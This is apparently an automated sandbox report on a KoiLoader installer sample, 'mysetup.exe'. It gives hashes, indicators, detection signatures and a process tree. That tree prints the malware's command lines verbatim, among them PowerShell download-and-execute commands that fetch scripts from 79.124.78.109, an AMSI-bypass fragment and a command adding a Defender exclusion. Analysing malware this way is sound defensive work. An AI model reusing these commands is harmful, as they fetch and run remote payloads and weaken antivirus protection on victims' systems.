Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29/11/2024, 22:34
Static task
static1
Behavioral task
behavioral1
Sample
mysetup.exe
Resource
win7-20240903-en
General
-
Target
mysetup.exe
-
Size
2.2MB
-
MD5
5cb042f9877f5876a19c86ded15fb1f8
-
SHA1
12249b4e9e8f5a3d66259d9172f8b6d4225812ab
-
SHA256
e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819
-
SHA512
f6c4c9198de1d3a18815db38e50f36f7f73103a050f07c73ad83e05371a7a13be985a84c437ce27a74638d96fffda1eb860fa3b7923e47d020a3912cecd3f490
-
SSDEEP
49152:FBuZrEUcH4ytTJpIbxrvfqKIy029s4C1eH9K:jkLcH4ytItfgt29s4C1eH9K
Malware Config
Extracted
http://79.124.78.109/wp-includes/phyllopodan7V7GD.php
http://79.124.78.109/wp-includes/barasinghaby.ps1
Extracted
koiloader
http://79.124.78.109/flocking.php
Signatures
-
Koiloader family
-
Detects KoiLoader payload 1 IoCs
resource yara_rule behavioral2/memory/3360-53-0x0000000007960000-0x000000000796D000-memory.dmp family_koi_loader -
Blocklisted process makes network request 6 IoCs
flow pid Process 6 2676 powershell.exe 14 3360 powershell.exe 17 3360 powershell.exe 18 2668 powershell.exe 38 3360 powershell.exe 45 3360 powershell.exe -
pid Process 3360 powershell.exe 4680 powershell.exe 2676 powershell.exe 2668 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 2956 mysetup.tmp -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mysetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mysetup.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2676 powershell.exe 2676 powershell.exe 3360 powershell.exe 3360 powershell.exe 4680 powershell.exe 4680 powershell.exe 2668 powershell.exe 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2676 powershell.exe Token: SeDebugPrivilege 3360 powershell.exe Token: SeDebugPrivilege 4680 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2956 2372 mysetup.exe 83 PID 2372 wrote to memory of 2956 2372 mysetup.exe 83 PID 2372 wrote to memory of 2956 2372 mysetup.exe 83 PID 2956 wrote to memory of 2676 2956 mysetup.tmp 84 PID 2956 wrote to memory of 2676 2956 mysetup.tmp 84 PID 2676 wrote to memory of 3956 2676 powershell.exe 86 PID 2676 wrote to memory of 3956 2676 powershell.exe 86 PID 3956 wrote to memory of 3360 3956 wscript.exe 88 PID 3956 wrote to memory of 3360 3956 wscript.exe 88 PID 3956 wrote to memory of 3360 3956 wscript.exe 88 PID 2168 wrote to memory of 836 2168 DllHost.exe 98 PID 2168 wrote to memory of 836 2168 DllHost.exe 98 PID 2168 wrote to memory of 836 2168 DllHost.exe 98 PID 836 wrote to memory of 4680 836 cmd.exe 100 PID 836 wrote to memory of 4680 836 cmd.exe 100 PID 836 wrote to memory of 4680 836 cmd.exe 100 PID 3360 wrote to memory of 1864 3360 powershell.exe 101 PID 3360 wrote to memory of 1864 3360 powershell.exe 101 PID 3360 wrote to memory of 1864 3360 powershell.exe 101 PID 1864 wrote to memory of 2668 1864 cmd.exe 105 PID 1864 wrote to memory of 2668 1864 cmd.exe 105 PID 1864 wrote to memory of 2668 1864 cmd.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\mysetup.exe"C:\Users\Admin\AppData\Local\Temp\mysetup.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\is-D68PA.tmp\mysetup.tmp"C:\Users\Admin\AppData\Local\Temp\is-D68PA.tmp\mysetup.tmp" /SL5="$7002E,1414311,832512,C:\Users\Admin\AppData\Local\Temp\mysetup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -command IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\vqPM0l4stR.js'); wscript ($env:temp+'\vqPM0l4stR.js');3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\vqPM0l4stR.js4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'http://79.124.78.109/wp-includes/phyllopodan7V7GD.php'; $l2 = 'http://79.124.78.109/wp-includes/barasinghaby.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zWF7V63A272'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4680
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r4fc725d8-4f7d-4884-b878-08bb0ce6c800r.js"1⤵PID:4460
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r4fc725d8-4f7d-4884-b878-08bb0ce6c800r.js"1⤵PID:3468
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
255B
MD58748a7d9b00db702fb676bafc9596c0a
SHA158ea79b800918f6bd24ba5a7a572b5692917ef9a
SHA25649ab913e7d4032bdc7ae100b6fe8ba8d8a7be118286161686facd186045df9c7
SHA5126de186ea5fcc830c010ee42f86953ed0f77944d86f25d4a29402fe33ec9447ab8dfbe16a78357c8c6302e3c0a4c21b2b4af79f4083bc4425a9b84ee5231910db
-
Filesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.1MB
MD575ff4b69506691689c816c05782e97e7
SHA1232ca459d1a83d8794ee30c96422a77739a57ad4
SHA256f5416883c1a43a0b96e48c1da17d38c586f8d6a9b7d9978845e119df4c98f76f
SHA5123c0e0d41d899f19933aabc0a8f86ce9b9c4d1ea6bdac74f07ee95792be6bcbb7b9b4ce0c2fe148024077a28287b742971ad788f5c08b3e90d47099e1664b06bc
-
Filesize
1KB
MD507b4ac5bb1f8a6f4408f9cb8a7d1324c
SHA129b802ed0f09defc247f39fd329d0cc18f799be6
SHA256eb5ef2cb5cc4682a886b91e43ae324804316e729b3cc16f389115667664a39c8
SHA512693ff38b89e43353b8d9bb60b14337d0364c50e97f092db8aaeb0cc6ba19cfc367bedd49081b9f12391023e489d5d03a93366cf005278ff8866d432e0e1dff69